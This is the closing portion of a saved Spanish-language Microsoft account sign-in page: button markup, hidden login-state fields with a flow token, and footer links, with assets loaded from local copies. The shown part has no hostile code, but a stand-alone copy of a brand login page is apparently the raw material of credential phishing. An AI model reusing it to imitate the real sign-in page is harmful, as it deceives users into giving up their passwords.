                    params: {
                        serverData: svr,
                        availableCreds: availableCredsWithoutUsername,
                        altCredHintEnabled: altCredHintEnabled() },
                    event: {
                        switchView: noUsernameCredSwitchLink_onSwitchView } } --><!--  --><!-- ko if: altCreds.length > 0 --><!-- /ko --><!-- /ko --><!-- ko if: !svr.w && svr.v --><!-- /ko --><!-- ko if: svr.showCantAccessAccountLink --><!-- /ko --> </div> </div> </div><div class="row" data-bind="css: { &#39;move-buttons&#39;: tenantBranding.BoilerPlateText }"> <div data-bind="component: { name: &#39;footer-buttons-field&#39;,
        params: {
            serverData: svr,
            isPrimaryButtonEnabled: !isRequestPending(),
            isPrimaryButtonVisible: svr.A9,
            isSecondaryButtonEnabled: true,
            isSecondaryButtonVisible: svr.A9 &amp;&amp; isBackButtonVisible() },
        event: {
            primaryButtonClick: primaryButton_onClick,
            secondaryButtonClick: secondaryButton_onClick } }"><div class="col-xs-24 no-padding-left-right form-group no-margin-bottom button-container" data-bind="
     visible: isPrimaryButtonVisible() || isSecondaryButtonVisible(),
     css: { &#39;no-margin-bottom&#39;: removeBottomMargin || svr.BM, &#39;button-container&#39;: svr.BM }"> <div data-bind="
            css: {
                &#39;inline-block&#39;: svr.BM,
                &#39;col-xs-12 secondary&#39;: isPrimaryButtonVisible() &amp;&amp; !svr.BM,
                &#39;col-xs-24&#39;: !(isPrimaryButtonVisible() || svr.BM) }" class="inline-block"> <input type="button" id="idBtn_Back" class="btn btn-block" data-bind="
            attr: {
                &#39;id&#39;: secondaryButtonId || &#39;idBtn_Back&#39;,
                &#39;aria-describedby&#39;: secondaryButtonDescribedBy },
            value: secondaryButtonText() || str[&#39;CT_HRD_STR_Splitter_Back&#39;],
            hasFocus: focusOnSecondaryButton,
            click: secondaryButton_onClick,
            enable: isSecondaryButtonEnabled,
            visible: isSecondaryButtonVisible" value="Atrás" style="display: none;"> </div> <div data-bind="
            css: {
                &#39;inline-block&#39;: svr.BM,
                &#39;col-xs-12 primary&#39;: isSecondaryButtonVisible() &amp;&amp; !svr.BM,
                &#39;col-xs-24&#39;: !(isSecondaryButtonVisible() || svr.BM) }" class="inline-block"> <input type="submit" id="idSIButton9" class="btn btn-block btn-primary" data-bind="
            attr: {
                &#39;id&#39;: primaryButtonId || &#39;idSIButton9&#39;,
                &#39;aria-describedby&#39;: primaryButtonDescribedBy },
            value: primaryButtonText() || str[&#39;CT_PWD_STR_SignIn_Button_Next&#39;],
            hasFocus: focusOnPrimaryButton,
            click: primaryButton_onClick,
            enable: isPrimaryButtonEnabled,
            visible: isPrimaryButtonVisible" value="Siguiente"> </div> </div></div> </div></div><!-- ko if: tenantBranding.BoilerPlateText --><!-- /ko --></div><!-- /ko --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- /ko --> </div></div> </div><!-- ko if: newSessionMessage --><!-- /ko --> <input type="hidden" name="ps" data-bind="value: postedLoginStateViewId" value=""> <input type="hidden" name="psRNGCDefaultType" data-bind="value: postedLoginStateViewRNGCDefaultType" value=""> <input type="hidden" name="psRNGCEntropy" data-bind="value: postedLoginStateViewRNGCEntropy" value=""> <input type="hidden" name="psRNGCSLK" data-bind="value: postedLoginStateViewRNGCSLK" value=""> <input type="hidden" name="canary" data-bind="value: svr.canary" value=""> <input type="hidden" name="ctx" data-bind="value: ctx" value=""> <input type="hidden" name="hpgrequestid" data-bind="value: svr.sessionId" value=""> <input type="hidden" id="i0327" data-bind="attr: { name: svr.bE }, value: flowToken" name="PPFT" value="DXL4*5PqlJxYbWF1al2pJcGkzu06TUjmkjRNXdZK0gK4YHx7lYaccraBrrRo2Z7p*WBxVlvij!VUGUNBNa0OfohWoH49TKEiHXGjhdvEQjA0HvrwrqhvfnSeY1RsGN0!CT9uRcOZqlp7weCUa1B!i9BmHlWbIBsDfvmS8jIhWvR12Amf4kSpGoI1EHd1CEIndQLr3MMV6O3fuhccCaPhzTLdm68POx1GEkMJ0NWyCW5vCMYj1oX!5KjzYs!tFGdAng$$"> <input type="hidden" name="PPSX" data-bind="value: svr.bH" value="Pas"> <input type="hidden" name="NewUser" value="1"> <input type="hidden" name="FoundMSAs" data-bind="value: svr.Ac" value=""> <input type="hidden" name="fspost" data-bind="value: svr.fPOST_ForceSignin ? 1 : 0" value="0"> <input type="hidden" name="i21" data-bind="value: wasLearnMoreShown() ? 1 : 0" value="0"> <input type="hidden" name="CookieDisclosure" data-bind="value: svr.aA ? 1 : 0" value="0"> <input type="hidden" name="IsFidoSupported" data-bind="value: isFidoSupported ? 1 : 0" value="0"> <div data-bind="component: { name: &#39;instrumentation&#39;,
                publicMethods: instrumentationMethods,
                params: { serverData: svr } }"><input type="hidden" name="i2" data-bind="value: clientMode" value="1"> <input type="hidden" name="i17" data-bind="value: srsFailed" value="0"> <input type="hidden" name="i18" data-bind="value: srsSuccess" value="__ConvergedLoginPaginatedStrings|1,__ConvergedLogin_PCore|1,"> <input type="hidden" name="i19" data-bind="value: timeOnPage" value=""></div> </div> <!-- /ko --></div><!-- /ko --><!-- ko if: showOptOutBanner --><!-- /ko --> <div id="footer" class="footer default" role="contentinfo" data-bind="css: { &#39;default&#39;: !backgroundLogoUrl() }"> <div data-bind="component: { name: &#39;footer-control&#39;,
            params: {
                serverData: svr,
                showLinks: true },
            event: {
                agreementClick: footer_agreementClick,
                moreInfoClick: footer_onShowDebugDetails } }"><!--  --><!-- ko if: showLinks || impressumLink || showIcpLicense --> <div id="footerLinks" class="footerNode text-secondary"><!-- ko if: !showIcpLicense --> <span id="ftrCopy" data-bind="html: svr.bi">©2018 Microsoft</span><!-- /ko --> <a id="ftrTerms" data-bind="text: str[&#39;MOBILE_STR_Footer_Terms&#39;], href: termsLink, click: termsLink_onClick" href="https://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&amp;mkt=ES-ES&amp;vv=1600">Términos de uso</a> <a id="ftrPrivacy" data-bind="text: str[&#39;MOBILE_STR_Footer_Privacy&#39;], href: privacyLink, click: privacyLink_onClick" href="https://login.live.com/gls.srf?urlID=MSNPrivacyStatement&amp;mkt=ES-ES&amp;vv=1600">Privacidad y cookies</a><!-- ko if: impressumLink --><!-- /ko --><!-- ko if: showIcpLicense --><!-- /ko --> <a href="https://login.live.com/pp1600/#" role="button" class="moreOptions" data-bind="click: moreInfo_onClick, ariaLabel: str[&#39;CT_STR_More_Options_Ellipsis_AriaLabel&#39;], attr: { title: str[&#39;CT_STR_More_Options_Ellipsis_AriaLabel&#39;] }" aria-label="Haga clic aquí para ver más opciones." title="Haga clic aquí para ver más opciones."><!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || !svr.fHasBackgroundColor) && !isHighContrastBlackTheme --> <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img class="desktopMode" role="presentation" pngsrc="https://auth.gfx.ms/16.000.27744.9/images/ellipsis_white.png?x=0ad43084800fd8b50a2576b5173746fe" svgsrc="https://auth.gfx.ms/16.000.27744.9/images/ellipsis_white.svg?x=5ac590ee72bfe06a7cecfd75b588ad73" data-bind="imgSrc" src="./index_files/ellipsis_white.svg"><!-- /ko --> <!-- /ko --><!-- /ko --><!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || !svr.fHasBackgroundColor) && !isHighContrastBlackTheme --> <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img class="mobileMode" role="presentation" pngsrc="https://auth.gfx.ms/16.000.27744.9/images/ellipsis_grey.png?x=5bc252567ef56db648207d9c36a9d004" svgsrc="https://auth.gfx.ms/16.000.27744.9/images/ellipsis_grey.svg?x=2b5d393db04a5e6e1f739cb266e65b4c" data-bind="imgSrc" src="./index_files/ellipsis_grey.svg"><!-- /ko --> <!-- /ko --><!-- /ko --> </a> </div> <!-- /ko --></div> </div> </form> <form method="post" target="_top" data-bind="autoSubmit: postRedirectForceSubmit, attr: { action: postRedirectUrl }"><!-- ko foreach: postRedirectParams --><!-- /ko --> </form><!-- ko if: svr.AU --><!-- /ko --><!-- ko if: svr.AQ --> <div id="idPartnerPL" data-bind="injectIframe: { url: svr.AQ }"><iframe height="0" width="0" src="./index_files/prefetch.html" style="display: none;"></iframe></div> <!-- /ko --></div></body></html>